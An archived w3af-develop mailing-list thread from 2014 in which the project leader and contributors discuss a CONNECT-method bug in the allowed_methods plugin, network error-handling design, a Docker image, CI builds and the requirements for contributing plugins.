Good Morning Everyone, I am a Computer Science student that is very interested in web security and penetration testing (about to begin studying for my OSCP!). For my Software Engineering class we have been asked to make a small contribution to an open-source project - so what better project to contribute to than W3af! I am very familiar with the concept of open-source projects, however outside of creating a Wordpress plugin, I have not contributed to one. Anyways, I was browsing through the Issues in the Github repo but I feel like I might be too green to tackle some of those (despite some Python experience). I wanted to reach out and see if there are any small bugs or maybe an update to some Documentation or something that you guys might be able to recommend for me to update Don't worry - I am not just some student who wants someone to do their homework for them, and then you will never hear from them again. I want to actively contribute to this project going forward - just looking for a bit of guidance for my first (small) contribution as we are under a short timeline for this assignment. Thank you all very much and I look forward to being apart of the W3af developer community! - JB |
|
From: Andres R. <and...@gm...> - 2014-09-04 23:38:08
|
List,
I'm currently working on (the much needed) error handling
"feature" for w3af [0], the user story says:
"""
I would like to have better handling for the case in which:
* My network connection died for a couple of seconds
* The server went offline for a couple of seconds
Currently w3af doesn't support this and will return an error, as a
user I would like w3af to auto-pause testing for some seconds and
auto-resume. This auto-pause feature should enable itself at most
three times in a row, if the server is still down w3af should return
an error.
"""
Now that I have to code it, I'm wondering... what's the best
strategy for doing this? My initial ideas are:
Assumptions
-----------------
Define fail as connection timeout, connection reset, host not
reachable, etc. (most socket errors)
Naive strategy
-------------------
* Define a MAX_CONSECUTIVE_ERRORS constant. If we reach it, stop the
whole scan.
* When one of the HTTP requests fails, delay all the following ones
for a couple of seconds
* If the next requests succeed, just continue as if nothing happen
* If they failed, keep delaying for a couple of seconds until we
recover OR reach MAX_CONSECUTIVE_ERRORS limit and stop the scan
% of MAX_CONSECUTIVE_ERRORS
---------------------------------------------------
* Define a MAX_CONSECUTIVE_ERRORS constant. If we reach it, stop the
whole scan.
* When one HTTP request fails, increase a counter (Only increase it
if the previous one also failed)
* When we reach 30% of MAX_CONSECUTIVE_ERRORS we delay all the
following HTTP requests hoping that the server/connection will recover
* If MAX_CONSECUTIVE_ERRORS is reached, then stop the scan
Anyone knows if there are papers on error network error handling
for cases like this? What's the best algorithm?
[0] https://github.com/andresriancho/w3af/issues/4811
Regards,
--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
|
|
From: Andres R. <and...@gm...> - 2014-08-29 18:28:38
|
List,
CircleCI, the continuous integration SaaS we use for building
w3af, is now providing a beta feature that allows open source projects
to show their CI builds. I've enabled the feature and now you're able
to see all the unit/functional tests run each time we change something
in w3af:
https://circleci.com/gh/andresriancho/w3af
Regards,
--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
|
|
From: Sergio A <foo...@gm...> - 2014-08-06 06:51:37
|
OK thanks a lot for your response. I'll experiment with extended_urllib.py and also try to fix the duplicates in the output. Thanks On Wed, Aug 6, 2014 at 12:15 AM, Andres Riancho <and...@gm...> wrote: > Sergio, > > On Tue, Aug 5, 2014 at 5:42 PM, Sergio A <foo...@gm...> wrote: >> Hi guys, >> >> Yesterday, while "playing" with w3af I saw something (detailed below) >> with the "allowed methods" plugin related to checking if the the http >> CONNECT method is available in a server or not and I'd like to know if >> you think it could be a bug or not. >> >> In the case you think it is a bug, I'd be very happy if I can fix it >> and, if possible, would like some advice or guidelines on what next >> steps you think I should do for implement the fix. >> The problem is that I'm not a python guru like you at all, currently I >> just know some python for my day to day stuff. >> And if it is not a bug, I'd like as well to contribute. So guidelines, >> advice, etc on how to do it is welcome :) >> >> Here is what I did: >> >> 1. git pull the last w3af version. >> >> 2. setup an apache server as a forward proxy >> >> Setup an apache web server that has enabled >> the CONNECT method for proxying clients (forward proxy not reverse >> proxy) so them can navigate setting the apache box as their proxy (the >> only client I´m testing now is on the same host hence Allow from >> 127.0.0.1). >> This is the relevant apache config I have (apart of the enabled >> mod_proxy modules, etc): >> >> <VirtualHost *:80> >> ProxyRequests On >> ProxyVia On >> AllowCONNECT 80 443 563 >> </VirtualHost> >> >> <Proxy *> >> Order deny,allow >> Deny from all >> Allow from 127.0.0.1 >> </Proxy> >> >> 3. Manually check CONNECT method is working >> >> (look at the format on the CONNECT line): >> >> bla@ubuntu:~$ telnet localhost 80 >> Trying 127.0.0.1... >> Connected to localhost. >> Escape character is '^]'. >> CONNECT google.com:80 HTTP/1.1 >> HOST: google.com >> >> HTTP/1.0 200 Connection Established <--- it worked >> Proxy-agent: Apache/2.4.7 (Ubuntu) >> >> blablablabla >> >> HTTP/1.0 400 Bad Request <---- this is normal because blablabla is a bad request >> Content-Type: text/html; charset=UTF-8 >> Content-Length: 1419 >> Date: Mon, 04 Aug 2014 18:13:32 GMT >> Server: GFE/2.0 >> <snip> > > Ok, so far so good :) I understood the setup. > >> 4. Setup a w3af profile for checking CONNECT method >> >> I setup a profile enabling only "allowed methods" plugin >> and this is what I see as the output of that plugin: >> >> """ The URL "http://localhost/" has the following enabled HTTP methods: >> CONNECT, GET, GET, HEAD, HEAD, OPTIONS, OPTIONS, POST, POST. This >> information was found in the requests with ids 32, 39, 47, 52, 55 and >> 71. """ > > Strange to see that there are duplicated methods! GET/GET, HEAD/HEAD, > etc. ugly at least. > >> Note that, apart of all the methods but CONNECT been duplicated, what >> I see when going into request/response navigator for the CONNECT >> request (which is the one with id 55) is (look on the CONNECT line format): >> >> Request: >> CONNECT http://localhost/ HTTP/1.1 >> Host: localhost >> Accept-encoding: gzip, deflate >> Accept: */* >> User-agent: w3af.org >> >> Response: >> HTTP/1.1 400 Bad Request >> date: Mon, 04 Aug 2014 16:57:55 GMT >> content-length: 300 >> content-type: text/html; charset=iso-8859-1 >> connection: close >> server: Apache/2.4.7 (Ubuntu) >> >> But, if I run again the same w3af profile and look with wireshark what >> I see "on the wire" (look here as well in the CONNECT line) is: >> >> Request: >> CONNECT / HTTP/1.1 >> Host: localhost >> Accept-encoding: gzip, deflate >> Accept: */* >> User-agent: w3af.org > > Ah, yes, that's a "bug" in the representation of the HTTP requests. It > is "known" (and ugly) that w3af sends: > > CONNECT / HTTP/1.1 > Host: localhost > Accept-encoding: gzip, deflate > Accept: */* > User-agent: w3af.org > > And this is recorded in the log/shown in the GUI: > > CONNECT http://localhost/ HTTP/1.1 > Host: localhost > Accept-encoding: gzip, deflate > Accept: */* > User-agent: w3af.org > > This was done to avoid adding host/port/protocol fields in the GUI and > text files. Does that make sense? Not sure. But now we just show: > > CONNECT http://localhost/ HTTP/1.1 > > And all the information is there. In an enhanced version we could have > a different GUI design with more widgets showing: > > Protocol: http > Port: 80 > Host: localhost > Request: > CONNECT / HTTP/1.1 > > That would be the ideal case. > > For your tests with the CONNECT method this is specially confusing. > >> Response: >> HTTP/1.1 400 Bad Request >> Date: Mon, 04 Aug 2014 17:06:57 GMT >> Server: Apache/2.4.7 (Ubuntu) >> Content-Length: 300 >> Connection: close >> Content-Type: text/html; charset=iso-8859-1 >> >> So in summary: >> >> (A) Manual request (which works): >> CONNECT google.com:80 HTTP/1.1 >> >> (B) w3af Request/Response navigator reported request: >> CONNECT http://localhost/ HTTP/1.1 >> >> (C) w3af on the wire request: >> CONNECT / HTTP/1.1 >> >> I think that according to the RFC it looks like a valid request should >> have just a hostname, a colon and a port, like (A) and not like (B) >> neither (C): >> http://tools.ietf.org/html/rfc7231#section-4.3.6 >> >> Do you think this could be a bug or issue on how w3af generates a >> CONNECT request ? > > * There is room for improvement in the way we show the request in the > GUI and store it in the log files. > > * In the allowed_methods plugin [0] we don't treat CONNECT in any > special way (it has a different format from the rest of the methods > but the plugin doesn't "know" about that) > > [0] https://github.com/andresriancho/w3af/blob/master/w3af/plugins/infrastructure/allowed_methods.py > >> Also, how about the duplicates in the plugin output (I mean method >> names appearing here twice on all but CONNECT): >> "The URL "http://localhost/" has the following enabled HTTP methods: >> CONNECT, GET, GET, HEAD, HEAD, OPTIONS, OPTIONS, POST, POST. This >> information was found in the requests with ids 32, 39, 47, 52, 55 and >> 71." > > That's a bug > >> 5. Digging a bit >> >> I went through the code trying to read it, and I think the connect >> request is generated in: >> w3af.core.data.url.extended_urllib.AnyMethod > > The request is sent here [1] and then it passed through the AnyMethod > (nice find there!). > > [1] https://github.com/andresriancho/w3af/blob/master/w3af/plugins/infrastructure/allowed_methods.py#L174 > >> But I'm not sure on where you think it could be a good place to fix it >> and how (of course in the case you thinking there´s a bug). > > The best place to fix this might be the allowed_methods.py plugin + > extended_urllib.py, but it might be *really* difficult to fix since we > don't have support for sending "raw" text, and: > > CONNECT google.com:80 HTTP/1.1 > HOST: google.com > > Might be "difficult" to send the "google.com:80". My advise is that > you should experiment with extended_urllib.py and wireshark to see if > you can make it send what you need, and then (if you got it) write a > new method in allowed_methods.py. This can help get you started with > your tests: > > pedro@laptop:~/pch/w3af$ python > Python 2.7.3 (default, Feb 27 2014, 19:58:35) > [GCC 4.6.3] on linux2 > Type "help", "copyright", "credits" or "license" for more information. >>>> from w3af.core.data.url.extended_urllib import ExtendedUrllib >>>> from w3af.core.data.parsers.url import URL >>>> from w3af.core.data.dc.headers import Headers >>>> xu = ExtendedUrllib() >>>> xu.CONNECT(URL('http://google.com:80/'), headers=Headers([('Host', 'www.google.com')])) > <HTTPResponse | 400 | http://google.com/ | id:1> >>>> > > Regards, > >> Regards >> >> ------------------------------------------------------------------------------ >> Infragistics Professional >> Build stunning WinForms apps today! >> Reboot your WinForms applications with our WinForms controls. >> Build a bridge from your legacy apps to the future. >> http://pubads.g.doubleclick.net/gampad/clk?id=153845071&iu=/4140/ostg.clktrk >> _______________________________________________ >> W3af-develop mailing list >> W3a...@li... >> https://lists.sourceforge.net/lists/listinfo/w3af-develop > > > > -- > Andrés Riancho > Project Leader at w3af - http://w3af.org/ > Web Application Attack and Audit Framework > Twitter: @w3af > GPG: 0x93C344F3 |
|
From: Andres R. <and...@gm...> - 2014-08-06 03:29:55
|
List,
I've been working on a docker image for w3af [0], for those who've
been experimenting with the technology, could you give it a try and
let me know what you think?
If you want to help improve this docker image, the Dockerfile is
here [1] and pull requests are welcome.
I'll wait a week or so to get your reviews and then send an
announcement to the users mailing list. Thanks!
[0] https://registry.hub.docker.com/u/andresriancho/w3af/
[1] https://github.com/andresriancho/w3af/blob/develop/extras/Dockerfile
Regards,
--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
|
|
From: Andres R. <and...@gm...> - 2014-08-05 23:15:31
|
Sergio, On Tue, Aug 5, 2014 at 5:42 PM, Sergio A <foo...@gm...> wrote: > Hi guys, > > Yesterday, while "playing" with w3af I saw something (detailed below) > with the "allowed methods" plugin related to checking if the the http > CONNECT method is available in a server or not and I'd like to know if > you think it could be a bug or not. > > In the case you think it is a bug, I'd be very happy if I can fix it > and, if possible, would like some advice or guidelines on what next > steps you think I should do for implement the fix. > The problem is that I'm not a python guru like you at all, currently I > just know some python for my day to day stuff. > And if it is not a bug, I'd like as well to contribute. So guidelines, > advice, etc on how to do it is welcome :) > > Here is what I did: > > 1. git pull the last w3af version. > > 2. setup an apache server as a forward proxy > > Setup an apache web server that has enabled > the CONNECT method for proxying clients (forward proxy not reverse > proxy) so them can navigate setting the apache box as their proxy (the > only client I´m testing now is on the same host hence Allow from > 127.0.0.1). > This is the relevant apache config I have (apart of the enabled > mod_proxy modules, etc): > > <VirtualHost *:80> > ProxyRequests On > ProxyVia On > AllowCONNECT 80 443 563 > </VirtualHost> > > <Proxy *> > Order deny,allow > Deny from all > Allow from 127.0.0.1 > </Proxy> > > 3. Manually check CONNECT method is working > > (look at the format on the CONNECT line): > > bla@ubuntu:~$ telnet localhost 80 > Trying 127.0.0.1... > Connected to localhost. > Escape character is '^]'. > CONNECT google.com:80 HTTP/1.1 > HOST: google.com > > HTTP/1.0 200 Connection Established <--- it worked > Proxy-agent: Apache/2.4.7 (Ubuntu) > > blablablabla > > HTTP/1.0 400 Bad Request <---- this is normal because blablabla is a bad request > Content-Type: text/html; charset=UTF-8 > Content-Length: 1419 > Date: Mon, 04 Aug 2014 18:13:32 GMT > Server: GFE/2.0 > <snip> Ok, so far so good :) I understood the setup. > 4. Setup a w3af profile for checking CONNECT method > > I setup a profile enabling only "allowed methods" plugin > and this is what I see as the output of that plugin: > > """ The URL "http://localhost/" has the following enabled HTTP methods: > CONNECT, GET, GET, HEAD, HEAD, OPTIONS, OPTIONS, POST, POST. This > information was found in the requests with ids 32, 39, 47, 52, 55 and > 71. """ Strange to see that there are duplicated methods! GET/GET, HEAD/HEAD, etc. ugly at least. > Note that, apart of all the methods but CONNECT been duplicated, what > I see when going into request/response navigator for the CONNECT > request (which is the one with id 55) is (look on the CONNECT line format): > > Request: > CONNECT http://localhost/ HTTP/1.1 > Host: localhost > Accept-encoding: gzip, deflate > Accept: */* > User-agent: w3af.org > > Response: > HTTP/1.1 400 Bad Request > date: Mon, 04 Aug 2014 16:57:55 GMT > content-length: 300 > content-type: text/html; charset=iso-8859-1 > connection: close > server: Apache/2.4.7 (Ubuntu) > > But, if I run again the same w3af profile and look with wireshark what > I see "on the wire" (look here as well in the CONNECT line) is: > > Request: > CONNECT / HTTP/1.1 > Host: localhost > Accept-encoding: gzip, deflate > Accept: */* > User-agent: w3af.org Ah, yes, that's a "bug" in the representation of the HTTP requests. It is "known" (and ugly) that w3af sends: CONNECT / HTTP/1.1 Host: localhost Accept-encoding: gzip, deflate Accept: */* User-agent: w3af.org And this is recorded in the log/shown in the GUI: CONNECT http://localhost/ HTTP/1.1 Host: localhost Accept-encoding: gzip, deflate Accept: */* User-agent: w3af.org This was done to avoid adding host/port/protocol fields in the GUI and text files. Does that make sense? Not sure. But now we just show: CONNECT http://localhost/ HTTP/1.1 And all the information is there. In an enhanced version we could have a different GUI design with more widgets showing: Protocol: http Port: 80 Host: localhost Request: CONNECT / HTTP/1.1 That would be the ideal case. For your tests with the CONNECT method this is specially confusing. > Response: > HTTP/1.1 400 Bad Request > Date: Mon, 04 Aug 2014 17:06:57 GMT > Server: Apache/2.4.7 (Ubuntu) > Content-Length: 300 > Connection: close > Content-Type: text/html; charset=iso-8859-1 > > So in summary: > > (A) Manual request (which works): > CONNECT google.com:80 HTTP/1.1 > > (B) w3af Request/Response navigator reported request: > CONNECT http://localhost/ HTTP/1.1 > > (C) w3af on the wire request: > CONNECT / HTTP/1.1 > > I think that according to the RFC it looks like a valid request should > have just a hostname, a colon and a port, like (A) and not like (B) > neither (C): > http://tools.ietf.org/html/rfc7231#section-4.3.6 > > Do you think this could be a bug or issue on how w3af generates a > CONNECT request ? * There is room for improvement in the way we show the request in the GUI and store it in the log files. * In the allowed_methods plugin [0] we don't treat CONNECT in any special way (it has a different format from the rest of the methods but the plugin doesn't "know" about that) [0] https://github.com/andresriancho/w3af/blob/master/w3af/plugins/infrastructure/allowed_methods.py > Also, how about the duplicates in the plugin output (I mean method > names appearing here twice on all but CONNECT): > "The URL "http://localhost/" has the following enabled HTTP methods: > CONNECT, GET, GET, HEAD, HEAD, OPTIONS, OPTIONS, POST, POST. This > information was found in the requests with ids 32, 39, 47, 52, 55 and > 71." That's a bug > 5. Digging a bit > > I went through the code trying to read it, and I think the connect > request is generated in: > w3af.core.data.url.extended_urllib.AnyMethod The request is sent here [1] and then it passed through the AnyMethod (nice find there!). [1] https://github.com/andresriancho/w3af/blob/master/w3af/plugins/infrastructure/allowed_methods.py#L174 > But I'm not sure on where you think it could be a good place to fix it > and how (of course in the case you thinking there´s a bug). The best place to fix this might be the allowed_methods.py plugin + extended_urllib.py, but it might be *really* difficult to fix since we don't have support for sending "raw" text, and: CONNECT google.com:80 HTTP/1.1 HOST: google.com Might be "difficult" to send the "google.com:80". My advise is that you should experiment with extended_urllib.py and wireshark to see if you can make it send what you need, and then (if you got it) write a new method in allowed_methods.py. This can help get you started with your tests: pedro@laptop:~/pch/w3af$ python Python 2.7.3 (default, Feb 27 2014, 19:58:35) [GCC 4.6.3] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> from w3af.core.data.url.extended_urllib import ExtendedUrllib >>> from w3af.core.data.parsers.url import URL >>> from w3af.core.data.dc.headers import Headers >>> xu = ExtendedUrllib() >>> xu.CONNECT(URL('http://google.com:80/'), headers=Headers([('Host', 'www.google.com')])) <HTTPResponse | 400 | http://google.com/ | id:1> >>> Regards, > Regards > > ------------------------------------------------------------------------------ > Infragistics Professional > Build stunning WinForms apps today! > Reboot your WinForms applications with our WinForms controls. > Build a bridge from your legacy apps to the future. > http://pubads.g.doubleclick.net/gampad/clk?id=153845071&iu=/4140/ostg.clktrk > _______________________________________________ > W3af-develop mailing list > W3a...@li... > https://lists.sourceforge.net/lists/listinfo/w3af-develop -- Andrés Riancho Project Leader at w3af - http://w3af.org/ Web Application Attack and Audit Framework Twitter: @w3af GPG: 0x93C344F3 |
|
From: Sergio A <foo...@gm...> - 2014-08-05 20:42:20
|
Hi guys, Yesterday, while "playing" with w3af I saw something (detailed below) with the "allowed methods" plugin related to checking if the the http CONNECT method is available in a server or not and I'd like to know if you think it could be a bug or not. In the case you think it is a bug, I'd be very happy if I can fix it and, if possible, would like some advice or guidelines on what next steps you think I should do for implement the fix. The problem is that I'm not a python guru like you at all, currently I just know some python for my day to day stuff. And if it is not a bug, I'd like as well to contribute. So guidelines, advice, etc on how to do it is welcome :) Here is what I did: 1. git pull the last w3af version. 2. setup an apache server as a forward proxy Setup an apache web server that has enabled the CONNECT method for proxying clients (forward proxy not reverse proxy) so them can navigate setting the apache box as their proxy (the only client I´m testing now is on the same host hence Allow from 127.0.0.1). This is the relevant apache config I have (apart of the enabled mod_proxy modules, etc): <VirtualHost *:80> ProxyRequests On ProxyVia On AllowCONNECT 80 443 563 </VirtualHost> <Proxy *> Order deny,allow Deny from all Allow from 127.0.0.1 </Proxy> 3. Manually check CONNECT method is working (look at the format on the CONNECT line): bla@ubuntu:~$ telnet localhost 80 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. CONNECT google.com:80 HTTP/1.1 HOST: google.com HTTP/1.0 200 Connection Established <--- it worked Proxy-agent: Apache/2.4.7 (Ubuntu) blablablabla HTTP/1.0 400 Bad Request <---- this is normal because blablabla is a bad request Content-Type: text/html; charset=UTF-8 Content-Length: 1419 Date: Mon, 04 Aug 2014 18:13:32 GMT Server: GFE/2.0 <snip> 4. Setup a w3af profile for checking CONNECT method I setup a profile enabling only "allowed methods" plugin and this is what I see as the output of that plugin: """ The URL "http://localhost/" has the following enabled HTTP methods: CONNECT, GET, GET, HEAD, HEAD, OPTIONS, OPTIONS, POST, POST. This information was found in the requests with ids 32, 39, 47, 52, 55 and 71. """ Note that, apart of all the methods but CONNECT been duplicated, what I see when going into request/response navigator for the CONNECT request (which is the one with id 55) is (look on the CONNECT line format): Request: CONNECT http://localhost/ HTTP/1.1 Host: localhost Accept-encoding: gzip, deflate Accept: */* User-agent: w3af.org Response: HTTP/1.1 400 Bad Request date: Mon, 04 Aug 2014 16:57:55 GMT content-length: 300 content-type: text/html; charset=iso-8859-1 connection: close server: Apache/2.4.7 (Ubuntu) But, if I run again the same w3af profile and look with wireshark what I see "on the wire" (look here as well in the CONNECT line) is: Request: CONNECT / HTTP/1.1 Host: localhost Accept-encoding: gzip, deflate Accept: */* User-agent: w3af.org Response: HTTP/1.1 400 Bad Request Date: Mon, 04 Aug 2014 17:06:57 GMT Server: Apache/2.4.7 (Ubuntu) Content-Length: 300 Connection: close Content-Type: text/html; charset=iso-8859-1 So in summary: (A) Manual request (which works): CONNECT google.com:80 HTTP/1.1 (B) w3af Request/Response navigator reported request: CONNECT http://localhost/ HTTP/1.1 (C) w3af on the wire request: CONNECT / HTTP/1.1 I think that according to the RFC it looks like a valid request should have just a hostname, a colon and a port, like (A) and not like (B) neither (C): http://tools.ietf.org/html/rfc7231#section-4.3.6 Do you think this could be a bug or issue on how w3af generates a CONNECT request ? Also, how about the duplicates in the plugin output (I mean method names appearing here twice on all but CONNECT): "The URL "http://localhost/" has the following enabled HTTP methods: CONNECT, GET, GET, HEAD, HEAD, OPTIONS, OPTIONS, POST, POST. This information was found in the requests with ids 32, 39, 47, 52, 55 and 71." 5. Digging a bit I went through the code trying to read it, and I think the connect request is generated in: w3af.core.data.url.extended_urllib.AnyMethod But I'm not sure on where you think it could be a good place to fix it and how (of course in the case you thinking there´s a bug). Regards |
|
From: Andres R. <and...@gm...> - 2014-05-04 23:44:21
|
List,
This [0] strange encoding issue, which only happens when the URL
contains "wierd unicode chars", is driving me crazy. Any encoding
expert out there that can help out?
[0] https://github.com/andresriancho/w3af/issues/580
Regards,
--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
|
|
From: Andres R. <and...@gm...> - 2014-05-04 15:08:23
|
List,
I'm taking vacations from 9 to 23 May, so don't expect any
answers/help from me during this time. Before leaving I'll try to
close all the pull-requests and open questions.
Regards,
--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
|
|
From: Andres R. <and...@gm...> - 2014-05-03 13:07:24
|
John,
Thanks for your interest in w3af and for contributing back by
writing this plugin :)
The plugin looks good, but the following is required for it to
make it into w3af:
* Code clean-up: NON_BIN is not used, str is duplicated from
a diffferent plugin, the output default doesn't work on windows
(/tmp/f5_asm_import.xml), error method lacks a "pass", strTargets is
not pep8.
* There are no unittests for the plugin, and this is a
requirement for any new plugin we add to the framework. At least three
tests are required:
- Check that the output matches an XSD
- Check that the plugin can handle known vulnerabilities
(as defined in _attack_type)
- Check that the plugin can hanle unknown vulnerabilities
It should be easy for you to write these plugins using these
two [1][2]. Tests are run using "nosetests path/to/test_foo.py"
* Once all those changes are done, follow [0] that will
explain to you how to create a pull request
Please CC the w3af-develop mailing list on all following answers,
I would love the community to review your code too
[0] https://github.com/andresriancho/w3af/wiki/Contributing-101
[1] https://github.com/andresriancho/w3af/blob/master/w3af/plugins/tests/output/test_xml_file.py
[2] https://github.com/andresriancho/w3af/blob/master/w3af/plugins/output/xml_file/report.xsd
Regards,
On Fri, May 2, 2014 at 11:04 PM, John Stauffacher
<joh...@gm...> wrote:
> Andres,
>
> I took some time to write a plugin for w3af that outputs an xml file
> needed to import into F5 ASM. The github repo is here:
>
> https://github.com/geekspeed/w3af_asm
>
> How would I go about getting it into the main branch?
--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
|
28 messages has been excluded from this view by a project administrator.
